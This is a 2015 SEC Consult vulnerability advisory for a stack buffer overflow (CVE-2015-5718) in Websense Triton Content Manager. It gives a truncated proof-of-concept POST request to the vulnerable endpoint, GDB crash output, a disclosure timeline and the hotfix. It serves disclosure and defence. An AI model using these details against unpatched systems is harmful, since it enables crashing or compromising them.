==============================
title: Stack buffer overflow in handle_debug_network
product: Websense Triton Content Manager
vulnerable version: 8.0.0 build 1165
fixed version: V8.0.0 HF02
CVE number: CVE-2015-5718
impact: high
homepage: www.websense.com
found: 2015-04-13
by: C. Schwarz (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
==============================
Vendor description:
- -------------------
Websense Content Gateway (Content Gateway) is a Linux-based, high-performance Web
proxy and cache that provides real-time content scanning and Web site classification
to protect network computers from malicious Web content while controlling employee
access to dynamic, user-generated Web 2.0 content. Web content has evolved from a
static information source to a sophisticated platform for 2-way communications,
which can be a valuable productivity tool when adequately secured.
URL: http://www.websense.com/
Business recommendation:
- ------------------------
Attackers are able to completely compromise the Websense Content Manager with
combined targeted attack vectors.
The scope of the test, where the vulnerabilities have been identified, was a
very short crash-test of the application. It is assumed that further
vulnerabilities exist within this product.
Vulnerability overview/description:
- ------------------------------
A stack-based buffer overflow was identified in the Websense Content Manager
administrative interface, which allows to write past the 512 bytes sized buffer
"dest" when calling "strcpy" in "handle_debug_network". The vulnerability can be
used in combination with a CSRF attack to crash the system or execute arbitrary
code.
Proof of concept:
- -----------------
A single HTTP request is sufficient to crash the content_manager binary application:
POST /submit_net_debug.cgi?mode=0&
Host: <content gateway>:8081
[...]
Content-Length: 869
record_version=10479%3A70&
Below is the GDB output of the process memory, most of the CPU's registers including
the stack pointer of various previous frames are overwritten with the value of 'A'.
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f122b073700 (LWP 50174)]
0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>,
arg=<value optimized out>) at
/home/cmbuild/Compass-Proxy/
997 /home/cmbuild/Compass-Proxy/
file or directory.
in /home/cmbuild/Compass-Proxy/
(gdb) i r
rax 0x0 0
rbx 0x4141414141414141 4702111234474983745
rcx 0x125c0 75200
rdx 0xda3f 55871
rsi 0x3541360 55841632
rdi 0x1 1
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7f122b070618 0x7f122b070618
r8 0x4141414141414141 4702111234474983745
r9 0x4141414141414141 4702111234474983745
r10 0x4141414141414141 4702111234474983745
r11 0x3f2c35a350 271324652368
r12 0x4141414141414141 4702111234474983745
r13 0x4141414141414141 4702111234474983745
r14 0x4141414141414141 4702111234474983745
r15 0x4141414141414141 4702111234474983745
rip 0x6becb1 0x6becb1 <handle_debug_network(
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) bt
#0 0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized
out>, arg=<value optimized out>) at
/home/cmbuild/Compass-Proxy/
#1 0x4141414141414141 in ?? ()
#2 0x4141414141414141 in ?? ()
#3 0x4141414141414141 in ?? ()
#4 0x4141414141414141 in ?? ()
#5 0x4141414141414141 in ?? ()
#6 0x4141414141414141 in ?? ()
#7 0x4141414141414141 in ?? ()
#8 0x4141414141414141 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
#15 0x4141414141414141 in ?? ()
#16 0x4141414141414141 in ?? ()
#17 0x0000000000000000 in ?? ()
(gdb)
Vulnerable / tested versions:
- -----------------------------
Websense Triton Content Manager 8.0.0 build 1165
Vendor contact timeline:
- ------------------------
2015-05-18: Contacting vendor
2015-06-02: established secure communication channel
2015-06-03: sending advisory draft
2015-06-24: requesting update from vendor
2015-07-16: requesting update from vendor
2015-07-20: requesting update from vendor
2015-07-24: Websense states that hotfix V8.0.0 HF02 was released on 2015-06-10
2015-08-05: Public advisory release
Solution:
- ---------
The vulnerability has beed fixed in hotfix V8.0.0 HF02.
http://www.websense.com/
Workaround:
- -----------
No workaround available.
Advisory URL:
- -------------
https://www.sec-consult.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_
EOF Christoph Schwarz / @2015
Komentarų nėra:
Rašyti komentarą